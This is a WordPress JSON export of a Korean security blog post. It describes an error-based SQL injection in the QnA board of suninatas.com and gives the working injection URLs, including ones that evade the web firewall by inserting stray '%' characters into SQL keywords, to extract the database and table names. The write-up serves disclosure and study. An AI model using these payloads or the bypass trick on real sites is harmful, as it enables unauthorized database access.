{"id":77,"date":"2018-11-28T15:49:02","date_gmt":"2018-11-28T15:49:02","guid":{"rendered":"https:\/\/blog.rubiya.kr\/?p=77"},"modified":"2018-11-28T15:51:47","modified_gmt":"2018-11-28T15:51:47","slug":"suninatas-com-sqli-vuln","status":"publish","type":"post","link":"https:\/\/blog.rubiya.kr\/index.php\/2018\/11\/28\/suninatas-com-sqli-vuln\/","title":{"rendered":"suninatas.com sqli vuln"},"content":{"rendered":"<p><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/blog.rubiya.kr\/wp-content\/uploads\/2018\/11\/sad.png\" alt=\"\" width=\"550\" height=\"226\" class=\"alignnone size-full wp-image-78\" \/><\/p>\n<p>suninatas.com \uc0ac\uc774\ud2b8\uac00 \ucc98\uc74c \ub9cc\ub4e4\uc5b4\uc84c\uc744\ub54c \uc77c\uccb4\uc758 \uc2dc\ud050\uc5b4\ucf54\ub529\uc774 \uc801\uc6a9\ub418\uc9c0 \uc54a\uc544\uc11c sqli, \ud30c\uc77c\ub2e4\uc6b4\ub85c\ub4dc \uacf5\uaca9\uc744 \uc131\uacf5\ud574\uc11c Hall of fame \uc5d0 \uc774\ub984\uc744 \uc62c\ub838\uc5c8\ub2e4.<\/p>\n<p>\uadf8\ub7f0\ub370 \uc62c\ud574 \ucd08\uc5d0 \ub2e4\uc2dc \ud55c\ubc88 SQL Injection \uc744 \uc131\uacf5\ud588\ub294\ub370 mssql \ud658\uacbd\uc5d0\uc11c\uc758 \uacf5\uaca9\uacbd\ud5d8\uc774 \uc7ac\ubbf8\uc788\uc5c8\ub358\uc9c0\ub77c \uacf5\uaca9 \uacfc\uc815\uc744 \ud3ec\uc2a4\ud305\ud558\uaca0\ub2e4.<\/p>\n<p>\ucde8\uc57d\uc810\uc740 QnA \uac8c\uc2dc\ud310\uc758 \uae00 \uc218\uc815 \uae30\ub2a5\uc5d0\uc11c \ud130\uc9c4\ub2e4.<\/p>\n<p>\uae00 \uc218\uc815\uc744 \ub20c\ub7ec\ubcf4\uba74<\/p>\n<p>http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=2592&#038;num=313&#038;divi=Free<\/p>\n<p>\uc774\ub807\uac8c \ub728\ub294\ub370 idx \uc778\uc790\ub97c \uc870\uc791\uc774 \uac00\ub2a5\ud558\ub2e4.<\/p>\n<p>mssql\uc740 \uc11c\ub85c \ub2e4\ub978 \ud0c0\uc785\uc758 \uac12\uc744 \ube44\uad50\ud574\uc8fc\uba74 \uc55e\uc758 \uc778\uc790\ub97c \uc5d0\ub7ec\uba54\uc138\uc9c0\uc5d0\uc11c \uadf8\ub300\ub85c \ucd9c\ub825\ud574\uc8fc\uae30\uc5d0 \uc5d0\ub7ec\uae30\ubc18 sql injection \uacf5\uaca9\uc744 \ud558\uae30\uc5d0 \uc218\uc6d4\ud558\ub2e4.<\/p>\n<p>http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=1&#8217;%20and%20database()=1&#8211;\u200b&#038;num=313&#038;divi=Free<\/p>\n<p>\uc774\ub798 \uacf5\uaca9\ud574\uc8fc\uba74 database \uc774\ub984\uc774 suninatas \uc778 \uac83\uc744 \uc54c \uc218 \uc788\ub2e4.<\/p>\n<p>\uadf8\ub7ec\ub098 \ud638\uc2a4\ud305\uc5c5\uccb4\uc5d0\uc11c \uc790\uccb4\uc801\uc73c\ub85c \ud544\ud130\ub9c1\uc744 \uac78\uc5c8\ub294\uc9c0 \uc8fc\uc694\ud55c \ub2e8\uc5b4\ub4e4\uc744 \uc785\ub825\ud558\uba74 \ucd9c\ub825\uc744 \ud558\uc9c0 \uc54a\uc558\ub2e4.<\/p>\n<p>(\uc6b4\uc601\uc9c4\uc774 \ud544\ud130\ub9c1\uc744 \uac78\uc5c8\uc744 \uacbd\uc6b0\uc5d0\ub294 \uba54\uc138\uc9c0\ub97c \ub744\uc6b0\uace0 \ub85c\uadf8\uc544\uc6c3\uc744 \uc2dc\ucf1c\ubc84\ub9ac\uae30\uc5d0 \uc6b4\uc601\uc9c4\uc774 \ud544\ud130\ub9c1\ud55c\uac8c \uc544\ub2c8\ub77c\uace0 \ucd94\uce21\ud560 \uc218 \uc788\uc5c8\ub2e4.)<\/p>\n<p>\ubc29\ud654\ubcbd\uc758 \uacbd\uc6b0\uc5d0\ub294 \ubc1b\uc544\uc628 \uac12\uc744 \uccb4\ud06c\ud558\ub294 \uacbd\uc6b0\ubcf4\ub2e4 url\uc744 \uc9c1\uc811 \uccb4\ud06c\ud574\uc11c \uacf5\uaca9\uc744 \ub9c9\ub294 \uacbd\uc6b0\uac00 \ub9ce\uae30\uc5d0 url\uc744 % \ub85c \uc624\uc5fc\uc2dc\ucf1c\uc11c \ubc29\ud654\ubcbd\uc744 \uc6b0\ud68c\ud560 \uc218 \uc788\uc5c8\ub2e4.<\/p>\n<p>% \ub4a4\uc5d0 16\uc9c4\uc218 2\uac1c\uac00 \uc548\uc62c\uacbd\uc6b0\uc5d0 \uc11c\ubc84\uc5d0\uc11c\ub294 \uc54c\uc544\uc11c % \ub97c \ubb34\uc2dc\ud558\uace0 \uac12\uc744 \ubc1b\uc544\ub4e4\uc774\uc9c0\ub9cc \ubc29\ud654\ubcbd\uc5d0\uc11c\ub294 % \ub54c\ubb38\uc5d0 \uc8fc\uc694 \ub2e8\uc5b4\ub97c \uccb4\ud06c\ud558\uc9c0 \ubabb\ud558\ub294 \uc6d0\ub9ac\uc774\ub2e4.<\/p>\n<p>mysql\uc758 information_schema \uc640 \uac19\uc740 \uc5ed\ud65c\uc744 \ud558\ub294 sysobject \ub97c \ud1b5\ud574\uc11c \uacf5\uaca9\uc744 \uc9c4\ud589\ud560 \uc218 \uc788\ub2e4.<\/p>\n<p>http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=<br \/>\n1&#8217;an%d%20(sele%ct%20top%201%20name%20fr%om%20suninatas..syso%bjects%20WH%ERE%20xtyp%e%20=%20&#8217;U&#8217;)=1&#8211;&#038;num=313&#038;divi=Free<\/p>\n<p>\uc774\ub7f0 \uacfc\uc815\uc744 \ud1b5\ud574\uc11c \ud14c\uc774\ube14\uba85\uc744 \uc54c\uc544\ub0bc \uc218 \uc788\uc5c8\uc73c\uba70 mssql \uc740 limit \ubb38\ubc95\uc774 \uc5c6\uae30\uc5d0 limit \uc744 \ub300\uc2e0\ud558\uae30 \uc704\ud574\uc11c\ub294<\/p>\n<p>http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=<br \/>\n1&#8217;an%d%20(sele%ct%20top%201%20name%20fr%om%20suninatas..syso%bjects%20WH%ERE%20xtyp%e%20=%20&#8217;U&#8217;%20an%d%20name%20not%20in<br \/>\n(sele%ct%20top%201%20name%20fr%om%20suninatas..syso%bjects%20WH%ERE%20xty%pe%20=%20&#8217;U&#8217;))=1&#8211;&#038;num=313&#038;divi=Free<\/p>\n<p>\uc774\ub807\uac8c \uacf5\uaca9\ud574\uc918\uc57c\ud55c\ub2e4.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>suninatas.com \uc0ac\uc774\ud2b8\uac00 \ucc98\uc74c \ub9cc\ub4e4\uc5b4\uc84c\uc744\ub54c \uc77c\uccb4\uc758 \uc2dc\ud050\uc5b4\ucf54\ub529\uc774 \uc801\uc6a9\ub418\uc9c0 \uc54a\uc544\uc11c sqli, \ud30c\uc77c\ub2e4\uc6b4\ub85c\ub4dc \uacf5\uaca9\uc744 \uc131\uacf5\ud574\uc11c Hall of fame \uc5d0 \uc774\ub984\uc744 \uc62c\ub838\uc5c8\ub2e4. \uadf8\ub7f0\ub370 \uc62c\ud574 \ucd08\uc5d0 \ub2e4\uc2dc \ud55c\ubc88 SQL Injection \uc744 \uc131\uacf5\ud588\ub294\ub370 mssql \ud658\uacbd\uc5d0\uc11c\uc758 \uacf5\uaca9\uacbd\ud5d8\uc774 \uc7ac\ubbf8\uc788\uc5c8\ub358\uc9c0\ub77c \uacf5\uaca9 \uacfc\uc815\uc744 \ud3ec\uc2a4\ud305\ud558\uaca0\ub2e4. \ucde8\uc57d\uc810\uc740 QnA \uac8c\uc2dc\ud310\uc758 \uae00 \uc218\uc815 \uae30\ub2a5\uc5d0\uc11c \ud130\uc9c4\ub2e4. \uae00 \uc218\uc815\uc744 \ub20c\ub7ec\ubcf4\uba74 http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=2592&#038;num=313&#038;divi=Free \uc774\ub807\uac8c \ub728\ub294\ub370 idx \uc778\uc790\ub97c \uc870\uc791\uc774 \uac00\ub2a5\ud558\ub2e4. mssql\uc740 \uc11c\ub85c \ub2e4\ub978 \ud0c0\uc785\uc758 \uac12\uc744 \ube44\uad50\ud574\uc8fc\uba74 \uc55e\uc758 \uc778\uc790\ub97c \uc5d0\ub7ec\uba54\uc138\uc9c0\uc5d0\uc11c \uadf8\ub300\ub85c \ucd9c\ub825\ud574\uc8fc\uae30\uc5d0 \uc5d0\ub7ec\uae30\ubc18 sql injection \uacf5\uaca9\uc744 \ud558\uae30\uc5d0 \uc218\uc6d4\ud558\ub2e4. http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx=1&#8217;%20and%20database()=1&#8211;\u200b&#038;num=313&#038;divi=Free \uc774\ub798 \uacf5\uaca9\ud574\uc8fc\uba74 database \uc774\ub984\uc774 suninatas \uc778 \uac83\uc744 \uc54c \uc218 \uc788\ub2e4. \uadf8\ub7ec\ub098 \ud638\uc2a4\ud305\uc5c5\uccb4\uc5d0\uc11c \uc790\uccb4\uc801\uc73c\ub85c \ud544\ud130\ub9c1\uc744 \uac78\uc5c8\ub294\uc9c0 \uc8fc\uc694\ud55c \ub2e8\uc5b4\ub4e4\uc744 \uc785\ub825\ud558\uba74 \ucd9c\ub825\uc744 \ud558\uc9c0 \uc54a\uc558\ub2e4. (\uc6b4\uc601\uc9c4\uc774 \ud544\ud130\ub9c1\uc744 \uac78\uc5c8\uc744 \uacbd\uc6b0\uc5d0\ub294 \uba54\uc138\uc9c0\ub97c \ub744\uc6b0\uace0 \ub85c\uadf8\uc544\uc6c3\uc744 \uc2dc\ucf1c\ubc84\ub9ac\uae30\uc5d0 \uc6b4\uc601\uc9c4\uc774 \ud544\ud130\ub9c1\ud55c\uac8c \uc544\ub2c8\ub77c\uace0 \ucd94\uce21\ud560 \uc218 \uc788\uc5c8\ub2e4.) \ubc29\ud654\ubcbd\uc758 \uacbd\uc6b0\uc5d0\ub294 \ubc1b\uc544\uc628 \uac12\uc744 \uccb4\ud06c\ud558\ub294 \uacbd\uc6b0\ubcf4\ub2e4 url\uc744 \uc9c1\uc811 \uccb4\ud06c\ud574\uc11c \uacf5\uaca9\uc744 \ub9c9\ub294 \uacbd\uc6b0\uac00 \ub9ce\uae30\uc5d0 url\uc744 % \ub85c \uc624\uc5fc\uc2dc\ucf1c\uc11c \ubc29\ud654\ubcbd\uc744 \uc6b0\ud68c\ud560 \uc218 \uc788\uc5c8\ub2e4. % \ub4a4\uc5d0 16\uc9c4\uc218 2\uac1c\uac00 \uc548\uc62c\uacbd\uc6b0\uc5d0 \uc11c\ubc84\uc5d0\uc11c\ub294 \uc54c\uc544\uc11c % \ub97c \ubb34\uc2dc\ud558\uace0 \uac12\uc744 \ubc1b\uc544\ub4e4\uc774\uc9c0\ub9cc \ubc29\ud654\ubcbd\uc5d0\uc11c\ub294 % \ub54c\ubb38\uc5d0 \uc8fc\uc694 \ub2e8\uc5b4\ub97c \uccb4\ud06c\ud558\uc9c0 \ubabb\ud558\ub294 \uc6d0\ub9ac\uc774\ub2e4. mysql\uc758 information_schema \uc640 \uac19\uc740 \uc5ed\ud65c\uc744 \ud558\ub294 sysobject \ub97c \ud1b5\ud574\uc11c \uacf5\uaca9\uc744 \uc9c4\ud589\ud560 \uc218 \uc788\ub2e4. http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx= 1&#8217;an%d%20(sele%ct%20top%201%20name%20fr%om%20suninatas..syso%bjects%20WH%ERE%20xtyp%e%20=%20&#8217;U&#8217;)=1&#8211;&#038;num=313&#038;divi=Free \uc774\ub7f0 \uacfc\uc815\uc744 \ud1b5\ud574\uc11c \ud14c\uc774\ube14\uba85\uc744 \uc54c\uc544\ub0bc \uc218 \uc788\uc5c8\uc73c\uba70 mssql \uc740 limit \ubb38\ubc95\uc774 \uc5c6\uae30\uc5d0 limit \uc744 \ub300\uc2e0\ud558\uae30 \uc704\ud574\uc11c\ub294 http:\/\/suninatas.com\/board\/view.asp?licen=add_del&#038;idx= 1&#8217;an%d%20(sele%ct%20top%201%20name%20fr%om%20suninatas..syso%bjects%20WH%ERE%20xtyp%e%20=%20&#8217;U&#8217;%20an%d%20name%20not%20in (sele%ct%20top%201%20name%20fr%om%20suninatas..syso%bjects%20WH%ERE%20xty%pe%20=%20&#8217;U&#8217;))=1&#8211;&#038;num=313&#038;divi=Free \uc774\ub807\uac8c \uacf5\uaca9\ud574\uc918\uc57c\ud55c\ub2e4.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/77"}],"collection":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/comments?post=77"}],"version-history":[{"count":2,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/77\/revisions"}],"predecessor-version":[{"id":80,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/77\/revisions\/80"}],"wp:attachment":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/media?parent=77"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/categories?post=77"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/tags?post=77"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}